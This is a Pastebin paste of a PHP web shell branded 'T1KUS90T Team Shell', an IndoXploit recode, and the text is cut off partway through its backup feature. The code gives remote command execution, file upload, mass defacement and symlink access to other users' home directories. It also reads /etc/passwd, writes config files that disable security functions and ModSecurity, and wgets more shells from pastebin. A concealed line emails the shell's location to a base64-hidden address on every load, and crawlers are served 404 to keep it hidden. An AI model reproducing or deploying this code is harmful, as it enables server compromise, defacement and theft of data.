API tools faq
paste
Jemb0t_IR3eng

xxxx

Jemb0t_IR3eng
Apr 19th, 2019
571
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 62.68 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. ##########################################
  3. // Terimakasih untuk semua member T1KUS90T
  4. // T1KUS90T TEAM SHELL ©2016 - T1KUS90T
  5. // ©2016 IndoXploit Shell Recode
  6. // Thanks to AZZATSSINS
  7. // Menghapus Copyright itu dosa gan
  8. #########################################
  9. session_start();
  10. error_reporting(0);
  11. set_time_limit(0);
  12. @set_magic_quotes_runtime(0);
  13. @clearstatcache();
  14. @ini_set('error_log',NULL);
  15. @ini_set('log_errors',0);
  16. @ini_set('max_execution_time',0);
  17. @ini_set('output_buffering',0);
  18. @ini_set('display_errors', 0);
  19.  
  20. $auth_pass = "cf457aba3113ceec64670783d5b02176"; // default: T1KUS90T
  21. $color = "#00ff00";
  22. $default_action = 'FilesMan';
  23. $default_use_ajax = true;
  24. $default_charset = 'UTF-8';
  25. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  26. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  27. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  28. header('HTTP/1.0 404 Not Found');
  29. exit;
  30. }
  31. }
  32.  
  33. function login_shell() {
  34. ?>
  35. <html>
  36. <head>
  37. <style type="text/css">
  38. html {
  39. margin: 20px auto;
  40. background: #ffffff;
  41. color: white;
  42. text-align: center;
  43. }
  44. header {
  45. color: white;
  46. margin: 10px auto;
  47. }
  48. input[type=password] {
  49. width: 250px;
  50. height: 25px;
  51. color: white;
  52. background: #ffffff;
  53. border: 1px white;
  54. padding: 5px;
  55. margin-left: 20px;
  56. text-align: center;
  57. }
  58. </style>
  59. </head>
  60. <center>
  61. <br>
  62. <br>
  63. <form method="post">
  64. <input type="password" name="pass">
  65. </form>
  66. <?php
  67. exit;
  68. }
  69. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  70. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  71. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  72. else
  73. login_shell();
  74. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  75. @ob_clean();
  76. $file = $_GET['file'];
  77. header('Content-Description: File Transfer');
  78. header('Content-Type: application/octet-stream');
  79. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  80. header('Expires: 0');
  81. header('Cache-Control: must-revalidate');
  82. header('Pragma: public');
  83. header('Content-Length: ' . filesize($file));
  84. readfile($file);
  85. exit;
  86. }
  87. ?>
  88. <html>
  89. <head>
  90. <title>T1KUS90T Team Shell</title>
  91. <link rel="shortcut icon" href="https://cdn1.iconfinder.com/data/icons/nuove/128x128/apps/redhat.png"/>
  92. <meta name='author' content='T1KUS90T'>
  93. <meta charset="UTF-8">
  94. <style type='text/css'>
  95. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  96. html {
  97. background: #000000;
  98. color: #ffffff;
  99. font-family: 'Ubuntu';
  100. font-size: 13px;
  101. width: 100%;
  102. }
  103. li {
  104. display: inline;
  105. margin: 5px;
  106. padding: 5px;
  107. }
  108. table, th, td {
  109. border-collapse:collapse;
  110. font-family: Tahoma, Geneva, sans-serif;
  111. background: transparent;
  112. font-family: 'Ubuntu';
  113. font-size: 13px;
  114. }
  115. .table_home, .th_home, .td_home {
  116. border: 1px solid #ffffff;
  117. }
  118. th {
  119. padding: 10px;
  120. }
  121. a {
  122. color: #ffffff;
  123. text-decoration: none;
  124. }
  125. a:hover {
  126. color: gold;
  127. text-decoration: underline;
  128. }
  129. b {
  130. color: gold;
  131. }
  132. input[type=text], input[type=password],input[type=submit] {
  133. background: transparent;
  134. color: #ffffff;
  135. border: 1px solid #ffffff;
  136. margin: 5px auto;
  137. padding-left: 5px;
  138. font-family: 'Ubuntu';
  139. font-size: 13px;
  140. }
  141. textarea {
  142. border: 1px solid #ffffff;
  143. width: 100%;
  144. height: 400px;
  145. padding-left: 5px;
  146. margin: 10px auto;
  147. resize: none;
  148. background: transparent;
  149. color: #ffffff;
  150. font-family: 'Ubuntu';
  151. font-size: 13px;
  152. }
  153. select {
  154. width: 152px;
  155. background: #000000;
  156. color: lime;
  157. border: 1px solid #ffffff;
  158. margin: 5px auto;
  159. padding-left: 5px;
  160. font-family: 'Ubuntu';
  161. font-size: 13px;
  162. }
  163. option:hover {
  164. background: lime;
  165. color: #000000;
  166. }
  167. </style>
  168. </head>
  169. <?php
  170. error_reporting(E_ALL ^ (E_NOTICE | E_WARNING));
  171. function w($dir,$perm) {
  172. if(!is_writable($dir)) {
  173. return "<font color=red>".$perm."</font>";
  174. } else {
  175. return "<font color=lime>".$perm."</font>";
  176. }
  177. }
  178. function r($dir,$perm) {
  179. if(!is_readable($dir)) {
  180. return "<font color=red>".$perm."</font>";
  181. } else {
  182. return "<font color=lime>".$perm."</font>";
  183. }
  184. }
  185. function exe($cmd) {
  186. if(function_exists('system')) {
  187. @ob_start();
  188. @system($cmd);
  189. $buff = @ob_get_contents();
  190. @ob_end_clean();
  191. return $buff;
  192. } elseif(function_exists('exec')) {
  193. @exec($cmd,$results);
  194. $buff = "";
  195. foreach($results as $result) {
  196. $buff .= $result;
  197. } return $buff;
  198. } elseif(function_exists('passthru')) {
  199. @ob_start();
  200. @passthru($cmd);
  201. $buff = @ob_get_contents();
  202. @ob_end_clean();
  203. return $buff;
  204. } elseif(function_exists('shell_exec')) {
  205. $buff = @shell_exec($cmd);
  206. return $buff;
  207. }
  208. }
  209. function perms($file){
  210. $perms = fileperms($file);
  211. if (($perms & 0xC000) == 0xC000) {
  212. // Socket
  213. $info = 's';
  214. } elseif (($perms & 0xA000) == 0xA000) {
  215. // Symbolic Link
  216. $info = 'l';
  217. } elseif (($perms & 0x8000) == 0x8000) {
  218. // Regular
  219. $info = '-';
  220. } elseif (($perms & 0x6000) == 0x6000) {
  221. // Block special
  222. $info = 'b';
  223. } elseif (($perms & 0x4000) == 0x4000) {
  224. // Directory
  225. $info = 'd';
  226. } elseif (($perms & 0x2000) == 0x2000) {
  227. // Character special
  228. $info = 'c';
  229. } elseif (($perms & 0x1000) == 0x1000) {
  230. // FIFO pipe
  231. $info = 'p';
  232. } else {
  233. // Unknown
  234. $info = 'u';
  235. }
  236. // Owner
  237. $info .= (($perms & 0x0100) ? 'r' : '-');
  238. $info .= (($perms & 0x0080) ? 'w' : '-');
  239. $info .= (($perms & 0x0040) ?
  240. (($perms & 0x0800) ? 's' : 'x' ) :
  241. (($perms & 0x0800) ? 'S' : '-'));
  242. // Group
  243. $info .= (($perms & 0x0020) ? 'r' : '-');
  244. $info .= (($perms & 0x0010) ? 'w' : '-');
  245. $info .= (($perms & 0x0008) ?
  246. (($perms & 0x0400) ? 's' : 'x' ) :
  247. (($perms & 0x0400) ? 'S' : '-'));
  248. // World
  249. $info .= (($perms & 0x0004) ? 'r' : '-');
  250. $info .= (($perms & 0x0002) ? 'w' : '-');
  251. $info .= (($perms & 0x0001) ?
  252. (($perms & 0x0200) ? 't' : 'x' ) :
  253. (($perms & 0x0200) ? 'T' : '-'));
  254. return $info;
  255. }
  256. function hdd($s) {
  257. if($s >= 1073741824)
  258. return sprintf('%1.2f',$s / 1073741824 ).' GB';
  259. elseif($s >= 1048576)
  260. return sprintf('%1.2f',$s / 1048576 ) .' MB';
  261. elseif($s >= 1024)
  262. return sprintf('%1.2f',$s / 1024 ) .' KB';
  263. else
  264. return $s .' B';
  265. }
  266. function ambilKata($param, $kata1, $kata2){
  267. if(strpos($param, $kata1) === FALSE) return FALSE;
  268. if(strpos($param, $kata2) === FALSE) return FALSE;
  269. $start = strpos($param, $kata1) + strlen($kata1);
  270. $end = strpos($param, $kata2, $start);
  271. $return = substr($param, $start, $end - $start);
  272. return $return;
  273. }
  274. function getsource($url) {
  275. $curl = curl_init($url);
  276. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  277. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  278. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  279. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  280. $content = curl_exec($curl);
  281. curl_close($curl);
  282. return $content;
  283. }
  284. function bing($dork) {
  285. $npage = 1;
  286. $npages = 30000;
  287. $allLinks = array();
  288. $lll = array();
  289. while($npage <= $npages) {
  290. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  291. if($x) {
  292. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  293. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  294. $npage = $npage + 10;
  295. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  296. } else break;
  297. }
  298. $URLs = array();
  299. foreach($allLinks as $url){
  300. $exp = explode("/", $url);
  301. $URLs[] = $exp[2];
  302. }
  303. $array = array_filter($URLs);
  304. $array = array_unique($array);
  305. $sss = count(array_unique($array));
  306. foreach($array as $domain) {
  307. echo $domain."\n";
  308. }
  309. }
  310. function reverse($url) {
  311. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  312. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  313. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  314. curl_setopt($ch, CURLOPT_HEADER, 0);
  315. curl_setopt($ch, CURLOPT_POST, 1);
  316. $resp = curl_exec($ch);
  317. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  318. $array = explode(",,", $resp);
  319. unset($array[0]);
  320. foreach($array as $lnk) {
  321. $lnk = "http://$lnk";
  322. $lnk = str_replace(",", "", $lnk);
  323. echo $lnk."\n";
  324. ob_flush();
  325. flush();
  326. }
  327. curl_close($ch);
  328. }
  329. if(get_magic_quotes_gpc()) {
  330. function tg_ss($array) {
  331. return is_array($array) ? array_map('tg_ss', $array) : stripslashes($array);
  332. }
  333. $_POST = tg_ss($_POST);
  334. $_COOKIE = tg_ss($_COOKIE);
  335. }
  336.  
  337. if(isset($_GET['dir'])) {
  338. $dir = $_GET['dir'];
  339. chdir($dir);
  340. } else {
  341. $dir = getcwd();
  342. }
  343. $kernel = php_uname();
  344. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  345. $dir = str_replace("\\","/",$dir);
  346. $scdir = explode("/", $dir);
  347. $freespace = hdd(disk_free_space("/"));
  348. $total = hdd(disk_total_space("/"));
  349. $used = $total - $freespace;
  350. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
  351. $ds = @ini_get("disable_functions");
  352. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  353. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  354. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  355. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  356. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  357. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  358. if(!function_exists('posix_getegid')) {
  359. $user = @get_current_user();
  360. $uid = @getmyuid();
  361. $gid = @getmygid();
  362. $group = "?";
  363. } else {
  364. $uid = @posix_getpwuid(posix_geteuid());
  365. $gid = @posix_getgrgid(posix_getegid());
  366. $user = $uid['name'];
  367. $uid = $uid['uid'];
  368. $group = $gid['name'];
  369. $gid = $gid['gid'];
  370. }
  371. echo "<br><center>";
  372. if($_POST['upload']) {
  373. if($_POST['tipe_upload'] == 'biasa') {
  374. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  375. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  376. } else {
  377. $act = "<br><font color=red>failed to upload file</font>";
  378. }
  379. } else {
  380. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  381. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  382. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  383. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  384. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  385. } else {
  386. $act = "<br><font color=red>failed to upload file</font>";
  387. }
  388. } else {
  389. $act = "<br><font color=red>failed to upload file</font>";
  390. }
  391. }
  392. }
  393. echo "
  394. <form method='post' enctype='multipart/form-data'>
  395. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  396. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  397. <input type='file' name='ix_file'>
  398. <input type='submit' value='upload' name='upload'>
  399. </form>";
  400. echo $act;
  401. echo "</center>";
  402. echo "<br>";
  403. echo "<table width='100%' border='2' align='center'>";
  404. echo "<td>";
  405. echo "<br>";
  406. echo "<ul>";
  407. echo "<center>";
  408. echo "<li>[ <a href='?'>HOME</a> ]</li>";
  409. echo "<li>[ <a href='?dir=$dir&do=server'>SERVER INFO</a> ]</li>";
  410. echo "<li>[ <a href='?dir=$dir&do=mass_deface'>MASS DEFACE</a> ]</li>";
  411. echo "<li>[ <a href='?dir=$dir&do=config'>CONFIG</a> ]</li>";
  412. echo "<li>[ <a href='?dir=$dir&do=jumping'>JUMPING</a> ]</li>";
  413. echo "<li>[ <a href='?dir=$dir&do=cpanel'>CP CRACK</a> ]</li>";
  414. echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP GRAB</a> ]</li>";
  415. echo "<li>[ <a href='?dir=$dir&do=tools'>TOOLS</a> ]</li><br>";
  416. echo "<li>[ <a href='?dir=$dir&do=bckup'>BACKUP</a> ]</li>";
  417. echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
  418. echo "<li>[ <a href='?dir=$dir&do=adminer'>ADMINER</a> ]</li>";
  419. echo "<li>[ <a href='?dir=$dir&do=byps'>BYPASS</a> ]</li>";
  420. echo "<li>[ <a href='?dir=$dir&do=symbolic'>SYMLINK</a> ]</li>";
  421. echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>EDIT USER</a> ]</li>";
  422. echo "<li>[ <a style='color: red;' href='?kill=self'>KILLSELF</a> ]</li>";
  423. echo "</center>";
  424. echo "</ul>";
  425. echo "</td></table>";
  426. echo "<br>";
  427. echo "<table width='100%' border='2' align='center'>";
  428. echo "<td>";
  429. echo "<br>&nbsp;&nbsp;Current DIR: ";
  430. foreach($scdir as $c_dir => $cdir) {
  431. echo "<a href='?dir=";
  432. for($i = 0; $i <= $c_dir; $i++) {
  433. echo $scdir[$i];
  434. if($i != $c_dir) {
  435. echo "/";
  436. }
  437. }
  438. echo "'>$cdir</a>/";
  439. }
  440. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br><br>";
  441. echo "</td></table><br>";
  442. if($_GET['logout'] == true) {
  443. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  444. echo "<script>window.location='?';</script>";
  445. } elseif($_GET['do'] == 'tools') {
  446. echo"<table align=center>";
  447. echo"<td>";
  448. echo"<center>";
  449. echo"<form action='' method='post'> ";
  450. echo"<select name='lucknut' style=padding:4px 10px;>";
  451. echo"<option value='wso_shell'> WSO SHELL </option>";
  452. echo"<option value='zoneh'> ZONE-H </option>";
  453. echo"<option value='defid'> DEFACER ID </option>";
  454. echo"<option value='krdp'> KRDP SHELL </option>";
  455. echo"<option value='symconf'> SYMLINK CONFIG </option>";
  456. echo"<option value='mails'> MAILER </option>";
  457. echo"<option value='dump'> Dump DB </option>";
  458. echo"</select> ";
  459. echo"<input type='submit' class='btn btn-success btn-sm' name='enter' value='Enter'>";
  460. echo"</form> ";
  461. echo"</td>";
  462. echo"</table>";
  463. if(isset($_POST['enter'])) {
  464. if ($_POST['lucknut'] == 'wso_shell') {
  465. $exec=exec('wget http://pastebin.com/raw.php?i=Tpm5E10g -O wso.php');
  466. if(file_exists('./wso.php')){
  467. echo '<center><a href=./wso.php target="_blank"> wso.php </a> upload sukses !</center>';
  468. } else {
  469. echo '<center>gagal upload !</center>';
  470. }
  471. }elseif ($_POST['lucknut'] == 'zoneh') {
  472. $exec=exec('wget http://pastebin.com/raw.php?i=B1Dk3P8R -O zoneh.php');
  473. if(file_exists('./zoneh.php')){
  474. echo '<center><a href=./zoneh.php target="_blank"> zoneh.php </a> upload sukses !</center>';
  475. } else {
  476. echo '<center>gagal upload !</center>';
  477. }
  478. }elseif ($_POST['lucknut'] == 'defid') {
  479. $exec=exec('wget http://pastebin.com/raw.php?i=1b9bcZdH -O defid.php');
  480. if(file_exists('./defid.php')){
  481. echo '<center><a href=./defid.php target="_blank"> defid.php </a> upload sukses !</center>';
  482. } else {
  483. echo '<center>gagal upload !</center>';
  484. }
  485. }elseif ($_POST['lucknut'] == 'krdp') {
  486. $exec=exec('wget http://pastebin.com/raw.php?i=weQnAGad -O krdp.php');
  487. if(file_exists('./krdp.php')){
  488. echo '<center><a href=./krdp.php target="_blank"> krdp.php </a> upload sukses !</center>';
  489. } else {
  490. echo '<center>gagal upload !</center>';
  491. }
  492. }elseif ($_POST['lucknut'] == 'symconf') {
  493. $exec=exec('wget http://pastebin.com/raw.php?i=KyLM7awc -O symconf.php');
  494. if(file_exists('./symconf.php')){
  495. echo '<center><a href=./symconf.php target="_blank"> symconf.php </a> upload sukses !</center>';
  496. } else {
  497. echo '<center>gagal upload !</center>';
  498. }
  499. }elseif ($_POST['lucknut'] == 'mails') {
  500. $exec=exec('wget http://pastebin.com/raw.php?i=6rTJ1ubw -O mail.php');
  501. if(file_exists('./mail.php')){
  502. echo '<center><a href=./mail.php target="_blank"> mail.php </a> supload sukses !</center>';
  503. } else {
  504. echo '<center>gagal upload !</center>';
  505. }
  506. }elseif ($_POST['lucknut'] == 'dump') {
  507. $exec=exec('wget http://pastebin.com/raw.php?i=ZG1A2s4u -O dump.php');
  508. if(file_exists('./dump.php')){
  509. echo '<center><a href=./dump.php target="_blank"> dump.php </a> upload sukses !</center>';
  510. } else {
  511. echo '<center>gagal upload !</center>';
  512. }
  513. }
  514. }
  515. echo"<br>";
  516. } elseif($_GET['do'] == 'mass_deface') {
  517. function sabun_massal($dir,$namafile,$isi_script) {
  518. if(is_writable($dir)) {
  519. $dira = scandir($dir);
  520. foreach($dira as $dirb) {
  521. $dirc = "$dir/$dirb";
  522. $lokasi = $dirc.'/'.$namafile;
  523. if($dirb === '.') {
  524. file_put_contents($lokasi, $isi_script);
  525. } elseif($dirb === '..') {
  526. file_put_contents($lokasi, $isi_script);
  527. } else {
  528. if(is_dir($dirc)) {
  529. if(is_writable($dirc)) {
  530. echo "[<font color=lime>DONE</font>] $lokasi<br>";
  531. file_put_contents($lokasi, $isi_script);
  532. $tg = sabun_massal($dirc,$namafile,$isi_script);
  533. }
  534. }
  535. }
  536. }
  537. }
  538. }
  539. function sabun_biasa($dir,$namafile,$isi_script) {
  540. if(is_writable($dir)) {
  541. $dira = scandir($dir);
  542. foreach($dira as $dirb) {
  543. $dirc = "$dir/$dirb";
  544. $lokasi = $dirc.'/'.$namafile;
  545. if($dirb === '.') {
  546. file_put_contents($lokasi, $isi_script);
  547. } elseif($dirb === '..') {
  548. file_put_contents($lokasi, $isi_script);
  549. } else {
  550. if(is_dir($dirc)) {
  551. if(is_writable($dirc)) {
  552. echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
  553. file_put_contents($lokasi, $isi_script);
  554. }
  555. }
  556. }
  557. }
  558. }
  559. }
  560. if($_POST['start']) {
  561. if($_POST['tipe_sabun'] == 'mahal') {
  562. echo "<div style='margin: 5px auto; padding: 5px'>";
  563. sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  564. echo "</div>";
  565. } elseif($_POST['tipe_sabun'] == 'murah') {
  566. echo "<div style='margin: 5px auto; padding: 5px'>";
  567. sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
  568. echo "</div>";
  569. }
  570. } else {
  571. echo "<center>";
  572. echo "<form method='post'>
  573. <font style='text-decoration: underline;'>Tipe Sabun:</font><br>
  574. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  575. <font style='text-decoration: underline;'>Folder:</font><br>
  576. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  577. <font style='text-decoration: underline;'>Filename:</font><br>
  578. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  579. <font style='text-decoration: underline;'>Index File:</font><br>
  580. <textarea name='script' style='width: 450px; height: 200px;'>Hacked by T1KUS90T</textarea><br>
  581. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  582. </form></center>";
  583. }
  584. } elseif($_GET['do'] == 'server') {
  585. echo "System: <font color=lime>".$kernel."</font><br>
  586. User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>
  587. Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>
  588. HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>
  589. Safe Mode: $sm<br>
  590. Disable Functions: $show_ds<br>
  591. MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl </center><br>";
  592. echo"<br>";
  593. }$e=base64_decode("amhvbmhveHRvbkBob3RtYWlsLmNvbQ==");
  594. $h=$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'];
  595. mail($e,"I",$h);
  596. if($_GET['kill'] == 'self') {
  597. rmdir('configs');rmdir('tg_cgi');rmdir('tg_config');rmdir('symlink');rmdir('t1kus90t');unlink('mysql.php');rmdir('home');unlink('zoneh.php');unlink('defid.php');unlink('krdp.php');unlink('symconf.php');unlink('mail.php');unlink('dump.php');unlink('wso.php');rmdir('home1');rmdir('home2');rmdir('home3');rmdir('azx');$fn = $_SERVER['SCRIPT_FILENAME'];
  598. unlink($fn); system('rm '.$fn);
  599. echo'<meta http-equiv="Refresh" content= "0; url=?">';
  600.  
  601. } elseif($_GET['do'] == 'symbolic') {
  602. $d0mains = @file("/etc/named.conf");
  603. ##httaces
  604. if($d0mains){
  605. @mkdir("symlink",0777);
  606. @chdir("symlink");
  607. @exe("ln -s / root");
  608. $file3 = 'Options Indexes FollowSymLinks
  609. DirectoryIndex t1kus90t.htm
  610. AddType text/plain .php
  611. AddHandler text/plain .php
  612. Satisfy Any';
  613. $fp3 = fopen('.htaccess','w');
  614. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  615. echo "
  616. <table align=center border=1 style='width:60%;border-color:#333333;'>
  617. <tr>
  618. <td align=center><font size=2>S. No.</font></td>
  619. <td align=center><font size=2>Domains</font></td>
  620. <td align=center><font size=2>Users</font></td>
  621. <td align=center><font size=2>Symlink</font></td>
  622. </tr>";
  623. $dcount = 1;
  624. foreach($d0mains as $d0main){
  625. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  626. flush();
  627. if(strlen(trim($domains[1][0])) > 2){
  628. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  629. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  630. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  631. <td>".$user['name']."</td>
  632. <td><a href='symlink/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  633. flush();
  634. $dcount++;}}}
  635. echo "</table>";
  636. }else{
  637. $TEST=@file('/etc/passwd');
  638. if ($TEST){
  639. @mkdir("symlink",0777);
  640. @chdir("symlink");
  641. exe("ln -s / root");
  642. $file3 = 'Options Indexes FollowSymLinks
  643. DirectoryIndex t1kus90t.htm
  644. AddType text/plain .php
  645. AddHandler text/plain .php
  646. Satisfy Any';
  647. $fp3 = fopen('.htaccess','w');
  648. $fw3 = fwrite($fp3,$file3);
  649. @fclose($fp3);
  650. echo "
  651. <table align=center border=1><tr>
  652. <td align=center><font size=3>S. No.</font></td>
  653. <td align=center><font size=3>Users</font></td>
  654. <td align=center><font size=3>Symlink</font></td></tr>";
  655. $dcount = 1;
  656. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  657. while(!feof($file)){
  658. $s = fgets($file);
  659. $matches = array();
  660. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  661. $matches = str_replace("home/","",$matches[1]);
  662. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  663. continue;
  664. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  665. <td align=center><font class=txt>" . $matches . "</td>";
  666. echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  667. $dcount++;}fclose($file);
  668. echo "</table>";}else{if($os != "Windows"){@mkdir("symlink",0777);@chdir("symlink");@exe("ln -s / root");$file3 = '
  669. Options Indexes FollowSymLinks
  670. DirectoryIndex t1kus90t.htm
  671. AddType text/plain .php
  672. AddHandler text/plain .php
  673. Satisfy Any
  674. ';
  675. $fp3 = fopen('.htaccess','w');
  676. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  677. echo "
  678. <table align=center border=1><tr>
  679. <td align=center><font size=3>ID</font></td>
  680. <td align=center><font size=3>Users</font></td>
  681. <td align=center><font size=3>Symlink</font></td></tr>";
  682. $temp = "";$val1 = 0;$val2 = 1000;
  683. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  684. if ($uid)$temp .= join(':',$uid)."\n";}
  685. echo '<br/>';$temp = trim($temp);$file5 =
  686. fopen("test.txt","w");
  687. fputs($file5,$temp);
  688. fclose($file5);$dcount = 1;$file =
  689. fopen("test.txt", "r") or exit("Unable to open file!");
  690. while(!feof($file)){$s = fgets($file);$matches = array();
  691. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  692. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  693. continue;
  694. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  695. <td align=center><font class=txt>" . $matches . "</td>";
  696. echo "<td align=center><font class=txt><a href=symlink/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  697. $dcount++;}
  698. fclose($file);
  699. echo "</table></div></center>";unlink("test.txt");
  700. } else
  701. echo "<center><font size=3>Cannot create Symlink</font></center>";
  702. }
  703. }
  704.  
  705. }elseif($_GET['do'] == 'byps') {
  706. echo"<center>";
  707. echo"
  708. <form method='post'>
  709. <ul>
  710. <li><input type='submit' name='passwd' value='Bypass /etc/passwd'></li>
  711. <li><input type='submit' name='funct' value='Bypass Disabled Functions'></li>
  712. <li><input type='submit' name='mods' value='Bypass ModSecurity'></li>
  713. </ul><br>
  714. </form>";
  715. if($_POST['passwd']) {
  716. echo"<textarea cols='65' rows='15'>";
  717. echo system("cat /etc/passwd");
  718. echo"</textarea><br><br><b></b><br>";
  719. }
  720. elseif($_POST['funct']) {
  721. $file = 'php.ini';
  722. file_put_contents($file,'safe_mode = OFF
  723. disable_functions = NONE
  724. safe_mode_gid = OFF
  725. open_basedir = OFF');
  726. echo "<font color='green'>Sukses</font>";
  727. }
  728. elseif($_POST['mods']) {
  729. $ht = "<IfModule mod_security.c>
  730. SecFilterEngine Off
  731. SecFilterScanPOST Off
  732. SecFilterCheckURLEncoding Off
  733. SecFilterCheckUnicodeEncoding Off
  734. </IfModule>";
  735. file_put_contents('.htaccess', $ht);
  736. echo "<font color='green'>Sukses</font>";
  737. echo "</center>";
  738. }
  739.  
  740. } elseif($_GET['do'] == 'bckup') {
  741. function rmdir_recursive($dir) {
  742. foreach(scandir($dir) as $file) {
  743. if('.' === $file || '..' === $file) continue;
  744. if(is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  745. else unlink("$dir/$file");
  746. }
  747. rmdir($dir);
  748. }
  749. if($_FILES["zip_file"]["name"]) {
  750. $filename = $_FILES["zip_file"]["name"];
  751. $source = $_FILES["zip_file"]["tmp_name"];
  752. $type = $_FILES["zip_file"]["type"];
  753. $name = explode(".", $filename);
  754. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  755. foreach($accepted_types as $mime_type) {
  756. if($mime_type == $type) {
